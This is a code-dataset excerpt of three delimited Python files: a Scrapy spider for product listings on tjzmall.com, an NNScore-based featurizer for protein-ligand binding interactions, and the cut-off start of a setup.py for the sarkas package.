from scrapy import Request, FormRequest
import re
import execjs
from ..spiders.shiji_base import BaseSpider
from urllib import quote
class TjzmallSpider(BaseSpider):
name = "tjzmall"
allowed_domains = ["tjzmall.com"]
#正式运行的时候,start_urls为空,通过redis来喂养爬虫
custom_settings = {
'DOWNLOAD_DELAY': 0.5,
'DOWNLOAD_TIMEOUT': 30,
'RETRY_TIMES': 20,
}
base_url = 'https://me.tjzmall.com'
start_urls = [
'http://me.tjzmall.com/default/',
'http://me.tjzmall.com/default/jin-kou-shi-pin/cheng-ren-nai-fen.html',
'http://me.tjzmall.com/default/shoes.html?cat=578'
]
start_urls_gender_product_type_dict = {
'http://me.tjzmall.com/default/jin-kou-shi-pin/cheng-ren-nai-fen.html': {'gender': 'unisex', 'product_type': u'食品饮料', 'category': u'成人奶粉'},
'http://me.tjzmall.com/default/shoes.html?cat=578': {'gender': 'women', 'product_type': u'生活用品', 'category': u'卫生巾'}
}
# 爬虫解析入口函数,用于解析丢入的第一个请求。每个请求对应一个大类
def start_requests(self):
for url in self.start_urls:
yield Request(url)
def parse(self, response):
sel = Selector(response)
if response.url in self.start_urls_gender_product_type_dict.keys():
category = self.start_urls_gender_product_type_dict[response.url]['category']
gender = self.start_urls_gender_product_type_dict[response.url]['gender']
product_type = self.start_urls_gender_product_type_dict[response.url]['product_type']
yield Request(response.url, callback=self.parse_list, meta={"category": category, "gender": gender, "product_type": product_type}, dont_filter=True)
nav_lis = sel.xpath('//div[@class="orderDivId orderDivShow"]/dl')[1:-1]
for nav_li in nav_lis:
product_type_as = nav_li.xpath('./dd/ul/li/strong/a')
for index, product_type_a in enumerate(product_type_as):
product_type = product_type_a.xpath('./text()').extract()[0].strip()
if product_type == '按功效':
continue
category_as = nav_li.xpath('./dd/ul/li/div[' + str(index+1) + ']/a')
for category_a in category_as:
if '女' in product_type:
gender = 'women'
elif '男' in product_type:
gender = 'men'
elif '宝宝' in product_type:
gender = 'baby'
elif '婴儿' in product_type:
gender = 'baby'
elif '孕妇' in product_type:
gender = 'women'
else:
gender = 'unisex'
category = product_type + category_a.xpath('./text()').extract()[0].strip()
category_url = category_a.xpath('./@href').extract()[0]
yield Request(category_url, callback=self.parse_list, meta={"category": category, "gender": gender, "product_type": product_type})
def parse_list(self, response):
category = response.meta['category']
gender = response.meta['gender']
product_type = response.meta['product_type']
sel = Selector(response)
product_lis = sel.xpath('//ul[contains(@class, "products-grid")]/li')
for goods_detail in product_lis:
item = BaseItem()
item['type'] = 'base'
item['from_site'] = 'tjzmall'
item['category'] = category
item['product_type'] = product_type
item['gender'] = gender
item['url'] = goods_detail.xpath('./h2/a/@href').extract()[0]
item['cover'] = goods_detail.xpath('./a/img/@src').extract()[0]
item['title'] = goods_detail.xpath('./h2/a/text()').extract()[0]
yield Request(item['url'], callback=self.parse_item, meta={"item": item})
if len(sel.xpath('//a[@class="next i-next"]')) > 0:
next_url = sel.xpath('//a[@class="next i-next"]/@href').extract()[0]
yield Request(next_url, callback=self.parse_list, meta={"category": category, "gender": gender, "product_type": product_type})
def parse_item(self, response):
item = response.meta['item']
return self.handle_parse_item(response, item)
def handle_parse_item(self, response, item):
sel = Selector(response)
item['show_product_id'] = sel.xpath('//div[@class="product-shop"]/p[4]/span[2]/text()').extract()[0]
if sel.xpath('//div[@class="product-shop"]/p[4]/span[2]/text()').extract()[0] == '本商品不支持货到付款':
item['show_product_id'] = sel.xpath('//div[@class="product-shop"]/p[5]/span[2]/text()').extract()[0]
item['brand'] = re.search('品牌</td><td>(.+)</td>', response.body).group(1)
item['desc'] = []
if len(sel.xpath('//div[@class="short-description"]/div/text()')) > 0:
item['desc'] = sel.xpath('//div[@class="short-description"]/div/text()').extract()
item['desc'] += sel.xpath('//div[@class="products-param"]/table').extract()
item['desc'] += sel.xpath('//div[@class="std"]/img').extract()
item['desc'] = ''.join(item['desc'])
price = sel.xpath('//div[@class="product-shop"]/p[@class="regular-price"]/span/span/text()').extract()[0]
colorItem = Color()
images = []
image_lis = sel.xpath('//div[@class="product-img-box"]/div[@class="more-views"]/ul/li')
for image_li in image_lis:
imageItem = ImageItem()
imageItem['image'] = image_li.xpath('./a/@href').extract()[0]
imageItem['thumbnail'] = imageItem['image'][:(imageItem['image'].find('image') + 6)] + '320x320/' +imageItem['image'][(imageItem['image'].find('image') + 6):]
images.append(imageItem)
if 'cover' not in colorItem.keys():
colorItem['cover'] = image_li.xpath('./a/img/@src').extract()[0]
colorItem['images'] = images
colorItem['type'] = 'color'
colorItem['from_site'] = item['from_site']
colorItem['show_product_id'] = item['show_product_id']
colorItem['name'] = 'One Color'
yield colorItem
skuItem = {}
skuItem['type'] = 'sku'
skuItem['show_product_id'] = item['show_product_id']
skuItem['id'] = item['show_product_id'] + '-sku'
skuItem['color'] = 'One Color'
skuItem['size'] = 'One Size'
skuItem['from_site'] = item['from_site']
skuItem['current_price'] = price
skuItem['list_price'] = price
skuItem['is_outof_stock'] = False
item['colors'] = ['One Color']
item['sizes'] = ['One Size']
item['skus'] = [skuItem]
yield item
| StarcoderdataPython |
3221610 | <filename>vs_utils/features/nnscore.py
"""
The following code implements a featurizer based on NNScore 2.0.1
## The following notice is copied from the original NNScore file.
# NNScore 2.01 is released under the GNU General Public License (see
# http://www.gnu.org/licenses/gpl.html).
# If you have any questions, comments, or suggestions, please don't
# hesitate to contact me, <NAME>, at jdurrant [at] ucsd [dot]
# edu. If you use NNScore 2.01 in your work, please cite [REFERENCE
# HERE].
"""
import os
import math
import re
import itertools
import tempfile
import shutil
import numpy as np
from vs_utils.features import ComplexFeaturizer
from vs_utils.utils.nnscore_pdb import PDB
from vs_utils.utils.nnscore_utils import Point
from vs_utils.utils.nnscore_utils import angle_between_points
from vs_utils.utils.nnscore_utils import angle_between_three_points
from vs_utils.utils.nnscore_utils import project_point_onto_plane
from vs_utils.utils.nnscore_utils import hydrogenate_and_compute_partial_charges
__author__ = "<NAME>"
__license__ = "GNU General Public License"
#ELECTROSTATIC_JOULE_PER_MOL = 138.94238460104697e4 # units?
# This is just a scaling factor, so it's set so as to keep the network
# inputs roughly contained in 0-1
ELECTROSTATIC_JOULE_PER_MOL = 10.0
# O-H distance is 0.96 A, N-H is 1.01 A. See
# http://www.science.uwaterloo.ca/~cchieh/cact/c120/bondel.html
H_BOND_DIST = 1.3 # angstroms
H_BOND_ANGLE = 40 # degrees
# If atoms are < 2.5 A apart, we count it as a close contact
CLOSE_CONTACT_CUTOFF = 2.5
# If receptor and ligand atoms are > 4 A apart, we consider them
# unable to interact with simple electrostatics.
CONTACT_CUTOFF = 4 # angstroms
# "PI-Stacking Interactions ALIVE AND WELL IN PROTEINS" says
# distance of 7.5 A is good cutoff. This seems really big to me,
# except that pi-pi interactions (parallel) are actually usually
# off centered. Interesting paper. Note that adenine and
# tryptophan count as two aromatic rings. So, for example, an
# interaction between these two, if positioned correctly, could
# count for 4 pi-pi interactions.
PI_PI_CUTOFF = 7.5
# Cation-pi interaction cutoff based on
# "Cation-pi interactions in structural biology."
CATION_PI_CUTOFF = 6.0
# 4 is good cutoff for salt bridges according to
# "Close-Range Electrostatic Interactions in Proteins",
# but looking at complexes, I decided to go with 5.5 A
SALT_BRIDGE_CUTOFF = 5.5
# This is perhaps controversial. I noticed that often a pi-cation
# interaction or other pi interaction was only slightly off, but
# looking at the structure, it was clearly supposed to be a pi-cation
# interaction. I've decided then to artificially expand the radius of
# each pi ring. Think of this as adding in a VDW radius, or
# accounting for poor crystal-structure resolution, or whatever you
# want to justify it.
PI_PADDING = 0.75
def hashtable_entry_add_one(hashtable, key, toadd=1):
"""Increments hashtable entry if exists, else creates entry."""
# note that dictionaries (hashtables) are passed by reference in python
if hashtable.has_key(key):
hashtable[key] = hashtable[key] + toadd
else:
hashtable[key] = toadd
def clean_atomtype(atomtype):
"""Removes extraneous charge info from atomtype
Atomtypes occasionally have charges such as O1+ or N1-. This function
uses regexps to replace these out.
atomtype: String
Raw atomtype extracted from PDB
"""
return re.sub(r'[0-9]+[+-]?', r'', atomtype)
def compute_hydrophobic_contacts(ligand, receptor):
"""
Compute possible hydrophobic contacts between ligand and atom.
Returns a dictionary whose keys are atompairs of type
"${RESIDUETYPE}_${RECEPTOR_ATOM}" where RESIDUETYPE is either "SIDECHAIN" or
"BACKBONE" and RECEPTOR_ATOM is "O" or "C" or etc. The
values count the number of hydrophobic contacts.
Parameters
----------
ligand: PDB
A PDB Object describing the ligand molecule.
receptor: PDB
A PDB object describing the receptor protein.
"""
# Now see if there's hydrophobic contacts (C-C contacts)
hydrophobics = {
'BACKBONE_ALPHA': 0, 'BACKBONE_BETA': 0, 'BACKBONE_OTHER': 0,
'SIDECHAIN_ALPHA': 0, 'SIDECHAIN_BETA': 0, 'SIDECHAIN_OTHER': 0}
for ligand_index in ligand.all_atoms:
ligand_atom = ligand.all_atoms[ligand_index]
for receptor_index in receptor.all_atoms:
receptor_atom = receptor.all_atoms[receptor_index]
dist = ligand_atom.coordinates.dist_to(receptor_atom.coordinates)
if dist < CONTACT_CUTOFF:
if ligand_atom.element == "C" and receptor_atom.element == "C":
hydrophobic_key = (
receptor_atom.side_chain_or_backbone() +
"_" + receptor_atom.structure)
hashtable_entry_add_one(hydrophobics, hydrophobic_key)
return hydrophobics
def compute_electrostatic_energy(ligand, receptor):
"""
Compute electrostatic energy between ligand and atom.
Returns a dictionary whose keys are atompairs of type
"${ATOMTYPE}_${ATOMTYPE}". The ATOMTYPE terms can equal "C", "O",
etc. One ATOMTYPE belongs to receptor, the other to ligand, but
information on which is which isn't preserved
(i.e., C-receptor, O-ligand and C-ligand, O-receptor generate the same
key). The values are the sum of associated coulomb energies for such
pairs (i.e., if there are three C_O interactions with energies 1, 2,
and 3 respectively, the total energy is 6).
Parameters
----------
ligand: PDB
A PDB Object describing the ligand molecule.
receptor: PDB
A PDB object describing the receptor protein.
"""
electrostatics = {}
for first, second in itertools.product(
Binana.atom_types, Binana.atom_types):
key = "_".join(sorted([first, second]))
electrostatics[key] = 0
for ligand_index in ligand.all_atoms:
ligand_atom = ligand.all_atoms[ligand_index]
for receptor_index in receptor.all_atoms:
receptor_atom = receptor.all_atoms[receptor_index]
atomtypes = [clean_atomtype(atom) for atom in
[ligand_atom.atomtype, receptor_atom.atomtype]]
key = "_".join(sorted(atomtypes))
dist = ligand_atom.coordinates.dist_to(receptor_atom.coordinates)
if dist < CONTACT_CUTOFF:
ligand_charge = ligand_atom.charge
receptor_charge = receptor_atom.charge
# to convert into J/mol; might be nice to double check this
# TODO(bramsundar): What are units of
# ligand_charge/receptor_charge?
coulomb_energy = ((ligand_charge * receptor_charge / dist)
* ELECTROSTATIC_JOULE_PER_MOL)
hashtable_entry_add_one(
electrostatics, key, coulomb_energy)
return electrostatics
def compute_ligand_atom_counts(ligand):
"""Counts atoms of each type in given ligand.
Returns a dictionary that maps atom types ("C", "O", etc.) to
counts.
Parameters
----------
ligand: PDB Object
Stores ligand information.
Returns
-------
ligand_atom_types: dictionary
Keys are atom types; values are integer counts.
"""
ligand_atom_types = {}
for atom_type in Binana.atom_types:
ligand_atom_types[atom_type] = 0
for ligand_index in ligand.all_atoms:
hashtable_entry_add_one(
ligand_atom_types,
clean_atomtype(ligand.all_atoms[ligand_index].atomtype))
return ligand_atom_types
def compute_active_site_flexibility(ligand, receptor):
"""
Compute statistics to judge active-site flexibility
Returns a dictionary whose keys are of type
"${RESIDUETYPE}_${STRUCTURE}" where RESIDUETYPE is either "SIDECHAIN"
or "BACKBONE" and STRUCTURE is either ALPHA, BETA, or OTHER and
corresponds to the protein secondary structure of the current residue.
Parameters
----------
ligand: PDB
A PDB Object describing the ligand molecule.
receptor: PDB
A PDB object describing the receptor protein.
"""
active_site_flexibility = {
'BACKBONE_ALPHA': 0, 'BACKBONE_BETA': 0, 'BACKBONE_OTHER': 0,
'SIDECHAIN_ALPHA': 0, 'SIDECHAIN_BETA': 0, 'SIDECHAIN_OTHER': 0}
for ligand_index in ligand.all_atoms:
ligand_atom = ligand.all_atoms[ligand_index]
for receptor_index in receptor.all_atoms:
receptor_atom = receptor.all_atoms[receptor_index]
dist = ligand_atom.coordinates.dist_to(receptor_atom.coordinates)
if dist < CONTACT_CUTOFF:
flexibility_key = (receptor_atom.side_chain_or_backbone() + "_"
+ receptor_atom.structure)
hashtable_entry_add_one(active_site_flexibility, flexibility_key)
return active_site_flexibility
def compute_pi_t(ligand, receptor):
"""
Computes T-shaped pi-pi interactions.
Returns a dictionary with keys of form T-SHAPED_${STRUCTURE} where
STRUCTURE is "ALPHA" or "BETA" or "OTHER". Values are counts of the
number of such stacking interactions.
Parameters
----------
ligand: PDB Object.
small molecule to dock.
receptor: PDB Object
protein to dock agains.
"""
pi_t = {'T-SHAPED_ALPHA': 0, 'T-SHAPED_BETA': 0, 'T-SHAPED_OTHER': 0}
for lig_aromatic in ligand.aromatic_rings:
for rec_aromatic in receptor.aromatic_rings:
lig_aromatic_norm_vector = Point(
coords=np.array([lig_aromatic.plane_coeff[0],
lig_aromatic.plane_coeff[1],
lig_aromatic.plane_coeff[2]]))
rec_aromatic_norm_vector = Point(
coords=np.array([rec_aromatic.plane_coeff[0],
rec_aromatic.plane_coeff[1],
rec_aromatic.plane_coeff[2]]))
angle_between_planes = (
angle_between_points(
lig_aromatic_norm_vector, rec_aromatic_norm_vector)
* 180.0/math.pi)
if (math.fabs(angle_between_planes-90) < 30.0
or math.fabs(angle_between_planes-270) < 30.0):
# so they're more or less perpendicular, it's probably a
# pi-edge interaction having looked at many structures, I
# noticed the algorithm was identifying T-pi reactions
# when the two rings were in fact quite distant, often
# with other atoms in between. Eye-balling it, requiring
# that at their closest they be at least 5 A apart seems
# to separate the good T's from the bad
min_dist = 100.0
for ligand_ind in lig_aromatic.indices:
ligand_at = ligand.all_atoms[ligand_ind]
for receptor_ind in rec_aromatic.indices:
receptor_at = receptor.all_atoms[receptor_ind]
dist = ligand_at.coordinates.dist_to(receptor_at.coordinates)
if dist < min_dist:
min_dist = dist
if min_dist <= 5.0:
# so at their closest points, the two rings come within
# 5 A of each other.
# okay, is the ligand pi pointing into the receptor
# pi, or the other way around? first, project the
# center of the ligand pi onto the plane of the
# receptor pi, and vs. versa
# This could be directional somehow, like a hydrogen
# bond.
pt_on_receptor_plane = project_point_onto_plane(
lig_aromatic.center, rec_aromatic.plane_coeff)
pt_on_ligand_plane = project_point_onto_plane(
rec_aromatic.center, lig_aromatic.plane_coeff)
# now, if it's a true pi-T interaction, this projected
# point should fall within the ring whose plane it's
# been projected into.
if ((pt_on_receptor_plane.dist_to(rec_aromatic.center)
<= rec_aromatic.radius + PI_PADDING) or
(pt_on_ligand_plane.dist_to(lig_aromatic.center)
<= lig_aromatic.radius + PI_PADDING)):
# so it is in the ring on the projected plane.
structure = receptor.all_atoms[rec_aromatic.indices[0]].structure
if structure == "":
# since it could be interacting with a cofactor or something
structure = "OTHER"
key = "T-SHAPED_" + structure
hashtable_entry_add_one(pi_t, key)
return pi_t
def compute_hydrogen_bonds(ligand, receptor):
"""
Computes hydrogen bonds between ligand and receptor.
Returns a dictionary whose keys are of form
HDONOR-${MOLTYPE}_${RESIDUETYPE}_${STRUCTURE} where MOLTYPE is either
"RECEPTOR" or "LIGAND", RESIDUETYPE is "BACKBONE" or "SIDECHAIN" and
where STRUCTURE is "ALPHA" or "BETA" or "OTHER". The values are counts
of the numbers of hydrogen bonds associated with the given keys.
Parameters
----------
ligand: PDB
A PDB Object describing the ligand molecule.
receptor: PDB
A PDB object describing the receptor protein.
"""
hbonds = {
'HDONOR-LIGAND_BACKBONE_ALPHA': 0,
'HDONOR-LIGAND_BACKBONE_BETA': 0,
'HDONOR-LIGAND_BACKBONE_OTHER': 0,
'HDONOR-LIGAND_SIDECHAIN_ALPHA': 0,
'HDONOR-LIGAND_SIDECHAIN_BETA': 0,
'HDONOR-LIGAND_SIDECHAIN_OTHER': 0,
'HDONOR-RECEPTOR_BACKBONE_ALPHA': 0,
'HDONOR-RECEPTOR_BACKBONE_BETA': 0,
'HDONOR-RECEPTOR_BACKBONE_OTHER': 0,
'HDONOR-RECEPTOR_SIDECHAIN_ALPHA': 0,
'HDONOR-RECEPTOR_SIDECHAIN_BETA': 0,
'HDONOR-RECEPTOR_SIDECHAIN_OTHER': 0}
for ligand_index in ligand.all_atoms:
ligand_atom = ligand.all_atoms[ligand_index]
for receptor_index in receptor.all_atoms:
receptor_atom = receptor.all_atoms[receptor_index]
# Now see if there's some sort of hydrogen bond between
# these two atoms. distance cutoff = H_BOND_DIST, angle cutoff =
# H_BOND_ANGLE.
dist = ligand_atom.coordinates.dist_to(receptor_atom.coordinates)
if dist < CONTACT_CUTOFF:
electronegative_atoms = ["O", "N", "F"]
if ((ligand_atom.element in electronegative_atoms)
and (receptor_atom.element in electronegative_atoms)):
hydrogens = []
# TODO(rbharath): This is a horrible inner-loop search. Can
# this be made more efficient?
for atm_index in ligand.all_atoms:
atom = ligand.all_atoms[atm_index]
if atom.element == "H":
# Make sure to set comment (used below)
atom.comment = "LIGAND"
if (atom.coordinates.dist_to(ligand_atom.coordinates)
< H_BOND_DIST):
hydrogens.append(atom)
for atm_index in receptor.all_atoms:
atom = receptor.all_atoms[atm_index]
if atom.element == "H":
# Make sure to set comment (used below)
atom.comment = "RECEPTOR"
if (atom.coordinates.dist_to(receptor_atom.coordinates)
< H_BOND_DIST):
hydrogens.append(atom)
#print "nearby hydrogens: " + str(hydrogens)
# now we need to check the angles
# TODO(rbharath): Rather than using this heuristic, it seems like
# it might be better to just report the angle in the feature
# vector...
for hydrogen in hydrogens:
angle = math.fabs(180 - angle_between_three_points(
ligand_atom.coordinates, hydrogen.coordinates,
receptor_atom.coordinates) * 180.0 / math.pi)
if angle <= H_BOND_ANGLE:
hbonds_key = (
"HDONOR-" + hydrogen.comment + "_" +
receptor_atom.side_chain_or_backbone() + "_" +
receptor_atom.structure)
hashtable_entry_add_one(hbonds, hbonds_key)
return hbonds
def compute_pi_pi_stacking(ligand, receptor):
"""
Computes pi-pi interactions.
Returns a dictionary with keys of form STACKING_${STRUCTURE} where
STRUCTURE is "ALPHA" or "BETA" or "OTHER". Values are counts of the
number of such stacking interactions.
Parameters
----------
ligand: PDB Object.
small molecule to dock.
receptor: PDB Object
protein to dock agains.
"""
pi_stacking = {'STACKING_ALPHA': 0, 'STACKING_BETA': 0, 'STACKING_OTHER': 0}
for lig_aromatic in ligand.aromatic_rings:
for rec_aromatic in receptor.aromatic_rings:
dist = lig_aromatic.center.dist_to(rec_aromatic.center)
if dist < PI_PI_CUTOFF:
# so there could be some pi-pi interactions. Now, let's
# check for stacking interactions. Are the two pi's roughly
# parallel?
lig_aromatic_norm_vector = Point(
coords=np.array([lig_aromatic.plane_coeff[0],
lig_aromatic.plane_coeff[1],
lig_aromatic.plane_coeff[2]]))
rec_aromatic_norm_vector = Point(
coords=np.array([rec_aromatic.plane_coeff[0],
rec_aromatic.plane_coeff[1],
rec_aromatic.plane_coeff[2]]))
angle_between_planes = (
angle_between_points(
lig_aromatic_norm_vector, rec_aromatic_norm_vector)
* 180.0/math.pi)
if (math.fabs(angle_between_planes-0) < 30.0
or math.fabs(angle_between_planes-180) < 30.0):
# so they're more or less parallel, it's probably pi-pi
# stacking now, since pi-pi are not usually right on
# top of each other. They're often staggered. So I don't
# want to just look at the centers of the rings and
# compare. Let's look at each of the atoms. do atom of
# the atoms of one ring, when projected onto the plane of
# the other, fall within that other ring?
# start by assuming it's not a pi-pi stacking interaction
pi_pi = False
for ligand_ring_index in lig_aromatic.indices:
# project the ligand atom onto the plane of the receptor ring
pt_on_receptor_plane = project_point_onto_plane(
ligand.all_atoms[ligand_ring_index].coordinates,
rec_aromatic.plane_coeff)
if (pt_on_receptor_plane.dist_to(rec_aromatic.center)
<= rec_aromatic.radius + PI_PADDING):
pi_pi = True
break
# TODO(rbharath): This if-else is confusing.
if pi_pi == False:
for receptor_ring_index in rec_aromatic.indices:
# project the ligand atom onto the plane of the receptor ring
pt_on_ligand_plane = project_point_onto_plane(
receptor.all_atoms[receptor_ring_index].coordinates,
lig_aromatic.plane_coeff)
if (pt_on_ligand_plane.dist_to(lig_aromatic.center)
<= lig_aromatic.radius + PI_PADDING):
pi_pi = True
break
if pi_pi == True:
structure = receptor.all_atoms[rec_aromatic.indices[0]].structure
if structure == "":
# since it could be interacting with a cofactor or something
structure = "OTHER"
key = "STACKING_" + structure
hashtable_entry_add_one(pi_stacking, key)
return pi_stacking
def compute_pi_cation(ligand, receptor):
"""
Computes number of pi-cation interactions.
Returns a dictionary whose keys are of form
${MOLTYPE}-CHARGED_${STRUCTURE} where MOLTYPE is either "LIGAND" or
"RECEPTOR" and STRUCTURE is "ALPHA" or "BETA" or "OTHER".
Parameters
----------
ligand: PDB Object
small molecule to dock.
receptor: PDB Object
protein to dock agains.
"""
pi_cation = {
'PI-CATION_LIGAND-CHARGED_ALPHA': 0,
'PI-CATION_LIGAND-CHARGED_BETA': 0,
'PI-CATION_LIGAND-CHARGED_OTHER': 0,
'PI-CATION_RECEPTOR-CHARGED_ALPHA': 0,
'PI-CATION_RECEPTOR-CHARGED_BETA': 0,
'PI-CATION_RECEPTOR-CHARGED_OTHER': 0}
for aromatic in receptor.aromatic_rings:
for charged in ligand.charges:
if charged.positive == True: # so only consider positive charges
if charged.coordinates.dist_to(aromatic.center) < CATION_PI_CUTOFF:
# project the charged onto the plane of the aromatic
charge_projected = project_point_onto_plane(
charged.coordinates, aromatic.plane_coeff)
if (charge_projected.dist_to(aromatic.center)
< aromatic.radius + PI_PADDING):
structure = receptor.all_atoms[aromatic.indices[0]].structure
if structure == "":
# since it could be interacting with a cofactor or something
structure = "OTHER"
key = "PI-CATION_LIGAND-CHARGED_" + structure
hashtable_entry_add_one(pi_cation, key)
for aromatic in ligand.aromatic_rings:
# now it's the ligand that has the aromatic group
for charged in receptor.charges:
if charged.positive: # so only consider positive charges
if charged.coordinates.dist_to(aromatic.center) < CATION_PI_CUTOFF:
charge_projected = project_point_onto_plane(
charged.coordinates, aromatic.plane_coeff)
if (charge_projected.dist_to(aromatic.center)
< aromatic.radius + PI_PADDING):
structure = receptor.all_atoms[charged.indices[0]].structure
if structure == "":
# since it could be interacting with a cofactor or something
structure = "OTHER"
key = "PI-CATION_RECEPTOR-CHARGED_" + structure
hashtable_entry_add_one(pi_cation, key)
return pi_cation
def compute_contacts(ligand, receptor):
"""Compute distance measurements for ligand-receptor atom pairs.
Returns two dictionaries, each of whose keys are of form
ATOMTYPE_ATOMTYPE.
Parameters
----------
ligand: PDB object
Should be loaded with the ligand in question.
receptor: PDB object.
Should be loaded with the receptor in question.
"""
ligand_receptor_contacts, ligand_receptor_close_contacts = {}, {}
for first, second in itertools.product(
Binana.atom_types, Binana.atom_types):
key = "_".join(sorted([first, second]))
ligand_receptor_contacts[key] = 0
ligand_receptor_close_contacts[key] = 0
for ligand_index in ligand.all_atoms:
for receptor_index in receptor.all_atoms:
ligand_atom = ligand.all_atoms[ligand_index]
receptor_atom = receptor.all_atoms[receptor_index]
dist = ligand_atom.coordinates.dist_to(receptor_atom.coordinates)
key = "_".join(
sorted([clean_atomtype(atom) for atom in
[ligand_atom.atomtype, receptor_atom.atomtype]]))
if dist < CONTACT_CUTOFF:
hashtable_entry_add_one(
ligand_receptor_contacts, key)
if dist < CLOSE_CONTACT_CUTOFF:
hashtable_entry_add_one(
ligand_receptor_close_contacts, key)
return ligand_receptor_close_contacts, ligand_receptor_contacts
def compute_salt_bridges(ligand, receptor):
"""
Computes number of ligand-receptor salt bridges.
Returns a dictionary with keys of form SALT-BRIDGE_${STRUCTURE} where
STRUCTURE is "ALPHA" or "BETA" or "OTHER."
Parameters
----------
ligand: PDB Object
small molecule to dock.
receptor: PDB Object
protein to dock agains.
"""
salt_bridges = {'SALT-BRIDGE_ALPHA': 0, 'SALT-BRIDGE_BETA': 0,
'SALT-BRIDGE_OTHER': 0}
for receptor_charge in receptor.charges:
for ligand_charge in ligand.charges:
if ligand_charge.positive != receptor_charge.positive:
# so they have oppositve charges
if (ligand_charge.coordinates.dist_to(
receptor_charge.coordinates) < SALT_BRIDGE_CUTOFF):
structure = receptor.all_atoms[receptor_charge.indices[0]].structure
key = "SALT-BRIDGE_" + structure
hashtable_entry_add_one(salt_bridges, key)
return salt_bridges
class Binana:
"""
Binana extracts a fingerprint from a provided binding pose.
TODO(rbharath): Write a function that extracts the binding-site residues
and their numbers. This will prove useful when debugging the fingerprint
for correct binding-pocket interactions.
TODO(rbharath): Write a function that lists charged groups in
binding-site residues.
TODO(rbharath): Write a function that aromatic groups in
binding-site residues.
TODO(rbharath) Write a function that lists charged groups in ligand.
TODO(rbharath): Write a function that lists aromatic groups in ligand.
The Binana feature vector transforms a ligand-receptor binding pose
into a feature vector. The feature vector has the following
components:
-vina_output: Components of vina's score function.
-ligand_receptor_contacts: List of contacts between ligand and
receptor atoms (< 4 A)
-ligand_receptor_electrostatics: Coulomb energy between contacting
ligand and receptor atoms.
-ligand_atom_counts: The atom types in the ligand.
-ligand_receptor_close_contacts: List of close contacts between
ligand and receptor (< 2.5 A)
-hbonds: List of hydrogen bonds.
-hydrophobic: List of hydrophobic contacts.
-stacking: List of pi-pi stacking.
-pi_cation: List of pi-cation interactions.
-t_shaped: List of T-shaped interactions.
The pi-cloud concentrates negative charge, leaving the edges of the
aromatic ring with some positive charge. Hence, T-shaped interactions
align the positive exterior of one ring with the negative interior of
another. See wikipedia for details.
-active_site_flexibility: Considers whether the receptor atoms are
backbone or sidechain and whether they are part of
alpha-helices or beta-sheets.
-salt_bridges: List of salt-bridges between ligand and receptor.
-rotatable_bonds_count: Count of (ligand(?), receptor(?))
rotatable bonds.
"""
# TODO(rbharath): What is atom type A here?
atom_types = [
"A", "AL", "AS", "B", "BE", "BR", "C", "CA", "CD", "CO", "CL", "CU",
"F", "FE", "H", "HG", "HD", "I", "IR", "MG", "MN", "N", "NA", "NI",
"O", "OA", "OS", "P", "PT", "RE", "RH", "RU", "S", "SA", "SE", "SI",
"SR", "V", "ZN"]
@staticmethod
def num_features():
"""Returns the length of Binana's feature vectors."""
num_atoms = len(Binana.atom_types)
feature_len = (
3*num_atoms*(num_atoms+1)/2 + num_atoms
+ 12 + 6 + 3 + 6 + 3 + 6 + 3 + 1)
return feature_len
def compute_input_vector_from_files(
self, ligand_pdb_filename, receptor_pdb_filename, line_header):
"""Computes feature vector for ligand-receptor pair.
Parameters
----------
ligand_pdb_filename: string
path to ligand's pdb file.
receptor_pdb_filename: string
path to receptor pdb file.
line_header: string
line separator in PDB files
"""
# Load receptor and ligand from file.
receptor = PDB()
receptor.load_from_files(receptor_pdb_filename, line_header)
receptor.assign_secondary_structure()
ligand = PDB()
ligand.load_from_files(ligand_pdb_filename, line_header)
self.compute_input_vector(ligand, receptor)
def compute_input_vector(self, ligand, receptor):
"""Computes feature vector for ligand-receptor pair.
Parameters
----------
ligand: PDB object
Contains loaded ligand.
receptor: PDB object
Contains loaded receptor.
"""
rotatable_bonds_count = {'rot_bonds': ligand.rotatable_bonds_count}
ligand_receptor_close_contacts, ligand_receptor_contacts = (
compute_contacts(ligand, receptor))
ligand_receptor_electrostatics = (
compute_electrostatic_energy(ligand, receptor))
ligand_atom_counts = compute_ligand_atom_counts(ligand)
hbonds = compute_hydrogen_bonds(ligand, receptor)
hydrophobics = compute_hydrophobic_contacts(ligand, receptor)
stacking = compute_pi_pi_stacking(ligand, receptor)
pi_cation = compute_pi_cation(ligand, receptor)
t_shaped = compute_pi_t(ligand, receptor)
active_site_flexibility = (
compute_active_site_flexibility(ligand, receptor))
salt_bridges = compute_salt_bridges(ligand, receptor)
input_vector = []
for features in [ligand_receptor_contacts,
ligand_receptor_electrostatics, ligand_atom_counts,
ligand_receptor_close_contacts, hbonds, hydrophobics,
stacking, pi_cation, t_shaped,
active_site_flexibility, salt_bridges,
rotatable_bonds_count]:
for key in sorted(features.keys()):
input_vector.append(features[key])
if len(input_vector) != Binana.num_features():
raise ValueError("Feature length incorrect.")
return input_vector
class NNScoreComplexFeaturizer(ComplexFeaturizer):
"""
Compute NNScore fingerprints for complexes.
"""
def __init__(self):
self.binana = Binana()
def _featurize_complex(self, mol_pdb, protein_pdb):
"""
Compute Binana fingerprint for complex.
"""
### OPEN TEMPDIR
tempdir = tempfile.mkdtemp()
mol_pdb_file = os.path.join(tempdir, "mol.pdb")
with open(mol_pdb_file, "w") as mol_f:
mol_f.writelines(mol_pdb)
protein_pdb_file = os.path.join(tempdir, "protein.pdb")
with open(protein_pdb_file, "w") as protein_f:
protein_f.writelines(protein_pdb)
mol_hyd_file = os.path.join(tempdir, "mol_hyd.pdb")
mol_pdbqt_file = os.path.join(tempdir, "mol_hyd.pdbqt")
hydrogenate_and_compute_partial_charges(
mol_pdb_file, "pdb", tempdir, mol_hyd_file, mol_pdbqt_file)
protein_hyd_file = os.path.join(tempdir, "protein_hyd.pdb")
protein_pdbqt_file = os.path.join(tempdir, "protein_hyd.pdbqt")
hydrogenate_and_compute_partial_charges(
protein_pdb_file, "pdb", tempdir, protein_hyd_file, protein_pdbqt_file)
mol_pdb_obj = PDB()
mol_pdb_obj.load_from_files(mol_pdb_file, mol_pdbqt_file)
protein_pdb_obj = PDB()
protein_pdb_obj.load_from_files(protein_pdb_file, protein_pdbqt_file)
features = self.binana.compute_input_vector(mol_pdb_obj, protein_pdb_obj)
### CLOSE TEMPDIR
shutil.rmtree(tempdir)
return features
| StarcoderdataPython |
1618482 | <reponame>lucianogsilvestri/sarkas<filename>setup.py
import glob
import os
import setuptools
import sys
from configparser import ConfigParser
from setuptools.command.develop import develop
from setuptools.command.install import install
# The following are needed to copy the MSU plot styles in Matplotlib folder
